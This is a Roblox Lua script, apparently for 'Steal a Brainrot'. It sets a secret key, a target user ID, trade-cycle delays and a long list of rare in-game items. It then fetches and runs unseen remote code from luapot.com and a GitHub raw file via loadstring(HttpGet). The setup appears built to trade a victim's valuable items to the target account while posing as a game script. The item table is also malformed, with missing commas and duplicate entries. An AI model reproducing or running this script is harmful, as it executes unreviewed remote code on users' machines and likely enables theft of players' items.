getgenv().SECRET_KEY = "mrr_2959d752b40b49f9a89f1806b3d13767"
getgenv().TARGET_ID = 9427580526
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Combinasion"] = true,
    ["Hydra Bunny"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Bunny and Eggy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Arcadragon"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["Pancake and Syrup"] = true,
    ["Foxini Lanternini"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["Cash or Card"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Food Combinasion"] = true,
    ["Elefanto Frigo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Ginger Gerat"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Festive 67"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Antonio"] = true,
    ["La Easter Grande"] = true,
    ["Rosetti Tualetti"] = true,
    ["Nacho Spyder"] = true,
    ["Garama and Madundung"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Rico Dinero"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Los Mariachis"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Bros"] = true,
    ["Celularcini Viciosini"] = true,
    ["Money Money Puggy"] = true,
    ["Los Hotspotsitos"] = true,
    ["Las Sis"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Swag Soda"] = true,
    ["Guest 666"] = true,
    ["Los Chillis"] = true,
    ["Fragola La La La"] = true,
    ["Secret Lucky Block"] = true,
    ["Secret Lucky Block"] = true,
    ["Secret Lucky Block"] = true,
    ["Unclito Samito"] = true,
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true   ["Boppin bunny"] = true,   ["Hopilikalika Hopilikalako"] = true,
["Money Money Bros"] = true,    ["Gym Bros"] = true,
}
task.spawn(function()
loadstring(game:HttpGet("https://luapot.com/api/loadstring/fb14c57cabe9536a3bac0c101cf7abc7"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ItsJamessYT/Lunix/refs/heads/main/Duels.lua"))()
end)
